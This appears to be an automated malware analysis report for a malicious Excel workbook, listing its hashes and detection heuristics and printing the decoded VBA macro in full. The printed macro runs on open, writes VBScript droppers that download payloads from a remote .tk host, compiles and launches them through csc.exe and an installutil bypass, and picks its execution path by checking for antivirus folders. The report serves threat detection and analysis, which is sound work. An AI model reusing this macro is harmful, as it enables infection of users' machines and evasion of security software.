Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16f298f302f89f0e…

MALICIOUS

Office (OLE)

190.5 KB Created: 2016-05-11 09:34:37 Authoring application: Microsoft Excel First seen: 2020-12-25
MD5: 2ad872e3cad9a67252c45a87abf9e3fa SHA-1: b3b388fc6a11ad8bb42db136459929404cdb9701 SHA-256: 16f298f302f89f0e55d102498a72c1e854e4c21b6ed3a55a159c8ad082c4bcb0
444 Risk Score

Heuristics 12

  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                        Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set fso = CreateObject("Scripting.FileSystemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        appdata = Environ$("APPDATA")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6790 bytes
SHA-256: 38dec768b516bd87d25e6771f946b393465d9db75b358eb88b90e9c74867b993
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    Main
End Sub

Sub showall()
        For Each Sheet In ActiveWorkbook.Sheets
            Sheet.Visible = xlSheetVisible
        Next Sheet
End Sub
Sub hidegood()
    showall
    For Each Sheet In ActiveWorkbook.Sheets
        If (Sheet.Name <> "Compatibility error") Then
            Sheet.Visible = xlSheetVeryHidden
        End If
    Next Sheet
    Sheets("Compatibility error").Select
    ActiveSheet.Protect Password:="11111111", DrawingObjects:=True, Contents:=True, Scenarios:= _
        False, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
        AllowFormattingRows:=True, AllowInsertingColumns:=True, AllowInsertingRows _
        :=True, AllowInsertingHyperlinks:=True, AllowDeletingColumns:=True, _
        AllowDeletingRows:=True, AllowSorting:=True, AllowFiltering:=True, _
        AllowUsingPivotTables:=True
End Sub

Sub showgood()
    showall
    For Each Sheet In ActiveWorkbook.Sheets
        If (Sheet.Name = "Compatibility error") Then
            Sheet.Visible = xlSheetVeryHidden
        End If
    Next Sheet
End Sub


Sub dropDL(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "Sub HTTPDow" + "nload( myURL, myPath )"
    oFile.WriteLine "    Dim i, objFile, obj" + "FSO, objHTTP, strFile, strMsg"
    oFile.WriteLine "    di" + "m bStrm: Set bStrm = create" + "object(""Adod" + "b.Stream"")"
    oFile.WriteLine "    Set objHTTP = CreateO" + "bject( ""WinHttp.WinHttpRequest.5.1"" )"
    oFile.WriteLine "    objHTTP.Open ""GET"", myURL, False"
    oFile.WriteLine "    objHTTP.Send"
    oFile.WriteLine "    with bStrm"
    oFile.WriteLine "        .type = 1"
    oFile.WriteLine "        .open"
    oFile.WriteLine "        .wri" + "te objHTTP.respon" + "seBody"
    oFile.WriteLine "        .sav" + "etofile myPath, 2"
    oFile.WriteLine "        .close"
    oFile.WriteLine "    end with"
    oFile.WriteLine "End Sub"
    oFile.WriteLine ""
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript." + "Sh" + "ell"")"
    oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
    oFile.WriteLine "HTTPDownload ""https://norni" + "ckel.tk/ps.cs?1"", userdir+""\ps.cs"""
    oFile.WriteLine "HTTPDownload ""https://nornick" + "el.tk/prestage.txt?1"", userdir+""\ps.txt"""
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
Sub dropEX(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
    oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
    oFile.WriteLine "cmp_cmd=""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe """
    oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__" + "31bf3856ad364e35\system.management.automation.dll """
    oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/out:%APPDATA%\ps.exe %APPDATA%\ps.cs"""
    oFile.WriteLine "oShell.Run cmp_cmd,0,false"
    oFile.WriteLine "WScript.Sleep 2000"
    oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """
    oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/logfile= /LogToConsole=false """
    oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/ScriptName=%APPDATA%\ps.txt /U %APPDATA%\ps.exe"""
    oFile.WriteLine "oShell.Run uninstall_cmd,0,false"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub

Sub dropVB(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    appdata = Environ$("APPDATA")
    oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\1.txt"").readAll()"
    oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\2.txt"").readAll()"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
Sub dropWP(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "<job>"
    oFile.WriteLine "<script language=""VBS" + "cript"" src=""1.txt""/>"
    oFile.WriteLine "<script language=""VBScrip" + "t"" src=""2.txt""/>"
    oFile.WriteLine "</job>"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
Sub Main()
        Dim dep1, dep2, windir, appdata As String
        Dim prereq As Boolean
        prereq = True
        windir = Environ$("WINDIR")
        appdata = Environ$("APPDATA") + "\"
        dep1 = windir + "\Microsoft.NET\F" + "ramework64\v4.0." + "30319\csc.exe"
        dep2 = windir + "\Microsoft.NE" + "T\Framework64\v4.0.3" + "0319\instal" + "lutil.exe"
        If (prereq) Then
                dropDL (appdata + "1.txt")
                dropEX (appdata + "2.txt")
                
                If ((Dir("C:\Program Fil" + "es (x86)\Kas" + "persky Lab", vbDirectory)) <> "") Or ((Dir("C:\Program Files (x86)\360", vbDirectory)) <> "") Or ((Dir("C:\Program Files\Trend Micro", vbDirectory)) <> "") Then
                    dropVB (appdata + "vb.vbs")
                    Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus
                Else
                    dropWP (appdata + "wp.wsf")
                    Shell "wsc" + "ript " + appdata + "wp.wsf", vbNormalFocus
                End If
        End If
    showgood
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True